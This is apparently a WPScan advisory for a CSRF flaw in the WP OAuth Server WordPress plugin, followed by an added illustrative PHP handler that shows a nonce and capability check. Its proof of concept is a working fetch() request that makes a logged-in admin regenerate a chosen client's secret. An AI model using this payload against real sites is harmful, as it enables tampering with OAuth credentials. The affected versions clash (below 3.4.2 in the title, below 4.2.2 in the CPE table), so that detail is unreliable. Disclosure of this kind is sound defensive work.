wpvulndb | Lana Codes | WPVDB-ID:E1FCDE2A-91A5-40CB-876B-884F01C80336
History: Nov 10, 2022 - 12:00 a.m.

WP OAuth Server < 3.4.2 - Client Secret Regeneration via CSRF

2022-11-10 00:00:00
Lana Codes
wpscan.com

6.5 Medium

CVSS3

Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: UNCHANGED
Confidentiality Impact: NONE
Integrity Impact: HIGH
Availability Impact: NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

The plugin does not perform a CSRF check when regenerating client secrets, which could allow attackers to make a logged-in admin regenerate the secret of an arbitrary client, provided they know the client ID.

PoC

Make a logged-in admin open a page containing the HTML code below. This will regenerate the secret for the client with ID KCzvPgkQndGfbFy34jfwoxKVCp1VzFhgSZ3PywN7:

    fetch('https://example.com/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=wo_regenerate_secret&data=KCzvPgkQndGfbFy34jfwoxKVCp1VzFhgSZ3PywN7',
        redirect: 'follow'
    })
        .then(response => response.text())
        .then(result => console.log(result))
        .catch(error => console.log('error', error));
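The missing check, shown as an added example of a hardened handler for the `wo_regenerate_secret` AJAX action; this is not the plugin's own code or its actual fix. The function names, the nonce action `example_regenerate_secret`, the script handle `example-admin`, the client ID pattern and the option-based storage are all assumptions made for illustration.

```php
<?php
// Added example (not the plugin's code): handler for the AJAX action named in the PoC.
add_action( 'wp_ajax_wo_regenerate_secret', 'example_regenerate_secret' );

function example_regenerate_secret() {
    // 1. CSRF: require a nonce minted for this action by the admin page.
    //    A cross-site page cannot read the nonce, so a forged POST stops here.
    if ( ! check_ajax_referer( 'example_regenerate_secret', '_wpnonce', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid or missing nonce' ), 403 );
    }

    // 2. Authorization: wp_ajax_* hooks only guarantee a logged-in user,
    //    not an administrator, so check the capability explicitly.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient privileges' ), 403 );
    }

    // 3. Input validation: the client ID arrives in the "data" POST field.
    //    The alphanumeric pattern is an assumption based on the ID in the PoC.
    $client_id = isset( $_POST['data'] )
        ? sanitize_text_field( wp_unslash( $_POST['data'] ) )
        : '';
    if ( ! preg_match( '/^[A-Za-z0-9]{1,64}$/', $client_id ) ) {
        wp_send_json_error( array( 'message' => 'Invalid client ID' ), 400 );
    }

    // 4. Only now change state. Option storage is a stand-in for the
    //    plugin's real client store, which this page does not describe.
    $new_secret = wp_generate_password( 40, false );
    update_option( 'example_client_secret_' . $client_id, $new_secret, false );

    wp_send_json_success( array( 'client_id' => $client_id, 'secret' => $new_secret ) );
}

// Admin side: hand the nonce to the page's own script so the legitimate
// request can send it as the _wpnonce POST field.
add_action( 'admin_enqueue_scripts', 'example_expose_nonce' );

function example_expose_nonce() {
    wp_localize_script(
        'example-admin', // hypothetical, already-registered script handle
        'exampleRegen',
        array( 'nonce' => wp_create_nonce( 'example_regenerate_secret' ) )
    );
}
```

With this in place, the request from the PoC carries no `_wpnonce` value and receives a 403 before any secret is touched.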

CPE

Name | Operator | Version
oauth2-provider | lt | 4.2.2
